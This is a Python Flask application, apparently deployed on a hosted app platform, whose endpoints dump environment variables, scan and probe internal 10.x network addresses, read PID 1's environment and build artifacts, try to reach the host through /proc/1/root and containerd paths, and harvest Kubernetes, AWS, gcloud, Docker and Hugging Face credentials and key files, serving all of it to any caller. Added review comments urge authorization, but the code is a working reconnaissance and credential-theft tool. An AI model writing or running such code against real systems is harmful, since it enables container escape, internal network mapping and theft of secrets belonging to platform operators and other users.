File size: 7,180 Bytes
da61b2a
 
 
c099686
 
c37bfd9
 
c099686
da61b2a
 
 
 
 
c37bfd9
 
 
 
c099686
 
 
 
 
 
c37bfd9
c099686
da61b2a
c099686
 
c37bfd9
c099686
c37bfd9
c099686
 
c37bfd9
c099686
 
c37bfd9
 
c099686
c37bfd9
c099686
 
 
c37bfd9
 
 
 
 
 
 
c099686
c37bfd9
c099686
c37bfd9
da61b2a
c37bfd9
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
c099686
 
 
c37bfd9
 
 
c099686
 
c37bfd9
c099686
c37bfd9
 
 
 
 
c099686
c37bfd9
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
c099686
 
 
c37bfd9
 
 
c099686
 
c37bfd9
 
 
c099686
c37bfd9
c099686
c37bfd9
c099686
c37bfd9
da61b2a
c37bfd9
da61b2a
c37bfd9
c099686
c37bfd9
da61b2a
c37bfd9
da61b2a
c37bfd9
 
c099686
c37bfd9
da61b2a
c37bfd9
da61b2a
c37bfd9
c099686
c37bfd9
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
da61b2a
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
import os
import subprocess
import json
import urllib.request
import socket
import ssl
import concurrent.futures
from flask import Flask, Response, request

# Flask application object; the route handlers in this module register on it.
app = Flask(__name__)

@app.route("/")
def index():
    """Return the process environment and the output of ``id`` as JSON.

    The ``id`` command is run with a 5-second timeout; a failure or timeout
    of that command propagates as an exception.

    NOTE(review): no access control is visible in this file, so every
    environment variable (which may include secrets) is sent to any caller.
    Only deploy where that is explicitly authorized.
    """
    id_output = subprocess.check_output(["id"], timeout=5)
    payload = {
        "env_vars": dict(os.environ),
        "id": id_output.decode().strip(),
    }
    body = json.dumps(payload, indent=2, default=str)
    return Response(body, mimetype='application/json')

@app.route("/probe")
def probe():
    """Check one host/port over TCP and fetch one HTTP path from it.

    Query parameters:
        target: host to contact (default ``10.108.144.112``).
        port: TCP port (default ``7860``). A value that is not an integer
            raises ``ValueError`` before any network activity.
        path: path appended to ``http://target:port`` (default ``/``).

    Returns:
        A JSON response with two keys:
        ``tcp``  - ``"open (code=0)"`` / ``"closed (code=N)"`` from
                   ``connect_ex``, or the exception text on failure.
        ``http`` - a dict with ``status``, the first 3000 characters of the
                   decoded body and the response ``headers``, or the
                   exception text on failure.

    NOTE(review): the target is fully caller-controlled and no access
    control is visible in this file; only deploy where probing the reachable
    network is explicitly authorized.
    """
    target = request.args.get("target", "10.108.144.112")
    port = int(request.args.get("port", "7860"))
    path = request.args.get("path", "/")
    results = {}

    try:
        # The context manager closes the socket even when connect_ex raises
        # (for example on a name-resolution failure).
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(3)
            result = s.connect_ex((target, port))
        results["tcp"] = f"{'open' if result == 0 else 'closed'} (code={result})"
    except Exception as e:
        results["tcp"] = str(e)

    try:
        # Close the HTTP response deterministically instead of relying on
        # garbage collection.
        with urllib.request.urlopen(f"http://{target}:{port}{path}", timeout=3) as resp:
            results["http"] = {
                "status": resp.status,
                "body": resp.read().decode()[:3000],
                "headers": dict(resp.headers),
            }
    except Exception as e:
        results["http"] = str(e)

    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')

@app.route("/scan")
def scan():
    """Check a run of ``base.N`` addresses for one open TCP port.

    Query parameters:
        base: first three octets of the addresses (default ``10.108.73``).
        port: TCP port to test (default ``7860``).
        start: first value of the last octet (default ``1``).
        end: last value of the last octet, inclusive (default ``20``).
        Non-integer ``port``/``start``/``end`` values raise ``ValueError``.

    At most 50 addresses are checked per request regardless of ``end``.

    Returns:
        A JSON response mapping each address that accepted the connection to
        the string ``"open"``. Addresses that refused, timed out or errored
        are omitted.

    NOTE(review): no access control is visible in this file; only deploy
    where scanning the reachable network is explicitly authorized.
    """
    base = request.args.get("base", "10.108.73")
    port = int(request.args.get("port", "7860"))
    start = int(request.args.get("start", "1"))
    end = int(request.args.get("end", "20"))

    def check_host(ip):
        """Return ``(ip, "open")`` if a connect succeeds within 1s, else None."""
        try:
            # The context manager closes the socket on every path.
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(1)
                if s.connect_ex((ip, port)) == 0:
                    return (ip, "open")
        except Exception:
            # Best effort: any failure for one host counts as "not open".
            return None
        return None

    results = {}
    stop = min(end + 1, start + 50)

    with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
        futures = [
            executor.submit(check_host, f"{base}.{i}")
            for i in range(start, stop)
        ]
        try:
            for future in concurrent.futures.as_completed(futures, timeout=10):
                found = future.result()
                if found:
                    results[found[0]] = found[1]
        except concurrent.futures.TimeoutError:
            # Report the hosts that finished in time instead of failing the
            # whole request. Leaving the ``with`` block still waits for the
            # remaining workers to end.
            pass

    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')

@app.route("/build-arg-test")
def build_arg_test():
    """Report PID 1's environment and any leftover build-tool paths as JSON.

    Returns:
        A JSON response with two keys:
        ``proc_1_environ``  - list of ``KEY=value`` strings read from
                              ``/proc/1/environ``, or the exception text if
                              it cannot be read.
        ``build_artifacts`` - for each path from a fixed list that exists:
                              the directory listing, the first 500
                              characters of the file, or the string
                              ``"exists but unreadable"``.

    NOTE(review): no access control is visible in this file, so the values
    above are returned to any caller.
    """
    results = {}

    # /proc/1/environ is a NUL-separated list of KEY=value byte strings.
    try:
        with open("/proc/1/environ", "rb") as f:
            env_bytes = f.read()
        results["proc_1_environ"] = [
            e.decode('utf-8', errors='replace')
            for e in env_bytes.split(b'\x00')
            if e
        ]
    except Exception as e:
        results["proc_1_environ"] = str(e)

    # Paths that build tooling may leave behind in an image.
    interesting_paths = [
        "/kaniko", "/workspace", "/.dockerconfigjson", "/root/.docker/config.json",
        "/tmp/build", "/buildkit", "/.buildkit_qemu_emulator",
        "/etc/buildkit", "/root/.cache"
    ]
    artifacts = {}
    results["build_artifacts"] = artifacts
    for p in interesting_paths:
        if not os.path.exists(p):
            continue
        try:
            if os.path.isdir(p):
                artifacts[p] = os.listdir(p)
            else:
                with open(p) as f:
                    artifacts[p] = f.read()[:500]
        except Exception:
            # Covers permission errors and undecodable content alike, without
            # also trapping SystemExit/KeyboardInterrupt as a bare except does.
            artifacts[p] = "exists but unreadable"

    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')

@app.route("/overlay-escape")
def overlay_escape():
    """Report what is visible through ``/proc/1/root`` and containerd paths.

    Each check is independent; on failure its entry holds the exception text.

    Returns:
        A JSON response with the keys:
        ``proc_1_root_etc_hostname`` - contents of ``/proc/1/root/etc/hostname``.
        ``proc_1_root_parent``       - listing of ``/proc/1/root/../``.
        ``symlink_escape``           - listing of ``/tmp/escape_link/``, a
                                       symlink to ``/proc/1/root``.
        ``containerd_snapshots``     - listing of ``/var/lib/containerd/``.

    NOTE(review): no access control is visible in this file; only deploy
    where this isolation testing is explicitly authorized.
    """
    results = {}

    # /proc/1/root is expected to resolve to this container's own root.
    try:
        with open("/proc/1/root/etc/hostname") as f:
            results["proc_1_root_etc_hostname"] = f.read()
    except Exception as e:
        results["proc_1_root_etc_hostname"] = str(e)

    # Does ".." from /proc/1/root lead anywhere other than the same root?
    try:
        results["proc_1_root_parent"] = os.listdir("/proc/1/root/../")
    except Exception as e:
        results["proc_1_root_parent"] = str(e)

    # Same listing reached through a symlink.
    link = "/tmp/escape_link"
    try:
        # Reuse the link left by an earlier request; unconditionally calling
        # os.symlink raises FileExistsError on every request after the first.
        if not os.path.islink(link):
            os.symlink("/proc/1/root", link)
        results["symlink_escape"] = os.listdir("/tmp/escape_link/")
    except Exception as e:
        results["symlink_escape"] = str(e)

    # Host-side containerd state should not be visible from the container.
    try:
        results["containerd_snapshots"] = os.listdir("/var/lib/containerd/")
    except Exception as e:
        results["containerd_snapshots"] = str(e)

    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')

@app.route("/token-hunt")
def token_hunt():
    """Report the contents of well-known credential paths as JSON.

    Two passes fill the result mapping, keyed by path:

    1. A fixed list of paths: a file yields its first 500 characters, a
       directory yields its listing, a missing path yields ``"not found"``,
       and an error yields the exception text.
    2. The top level only (no recursion) of ``/``, ``/app``, ``/home``,
       ``/root`` and ``/tmp``: every file whose name ends in ``.env``,
       ``.token``, ``.key``, ``.pem`` or ``credentials`` yields its first
       200 characters. Files that cannot be read are skipped.

    NOTE(review): no access control is visible in this file, so any
    credential found is returned to any caller. Only deploy where this
    testing is explicitly authorized.
    """
    results = {}

    token_paths = [
        "/var/run/secrets/kubernetes.io/serviceaccount/token",
        "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
        "/var/run/secrets/kubernetes.io/serviceaccount/namespace",
        "/root/.kube/config",
        "/root/.docker/config.json",
        "/root/.aws/credentials",
        "/root/.gcloud/credentials",
        "/home/user/.cache/huggingface/token",
        "/root/.cache/huggingface/token",
        "/root/.huggingface/token",
    ]

    for p in token_paths:
        try:
            if os.path.isfile(p):
                with open(p) as f:
                    results[p] = f.read()[:500]
            elif os.path.isdir(p):
                results[p] = os.listdir(p)
            else:
                results[p] = "not found"
        except Exception as e:
            results[p] = str(e)

    suffixes = ('.env', '.token', '.key', '.pem', 'credentials')
    for root_dir in ["/", "/app", "/home", "/root", "/tmp"]:
        # Only the first os.walk entry is used, i.e. the files directly
        # inside root_dir. os.walk ignores listing errors by default, so a
        # missing or unreadable directory simply yields nothing.
        top = next(os.walk(root_dir, topdown=True), None)
        if top is None:
            continue
        dirpath, _dirnames, filenames = top
        for name in filenames:
            if not name.endswith(suffixes):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full) as fh:
                    results[full] = fh.read()[:200]
            except Exception:
                # Best effort: unreadable or undecodable files are omitted.
                continue

    return Response(json.dumps(results, indent=2, default=str), mimetype='application/json')

# Script entry point: start Flask's built-in server on port 7860.
# NOTE(review): host "0.0.0.0" binds every network interface, so the
# endpoints are reachable by anything that can route to this machine.
if __name__ == "__main__":
    app.run(host="0.0.0.0", port=7860)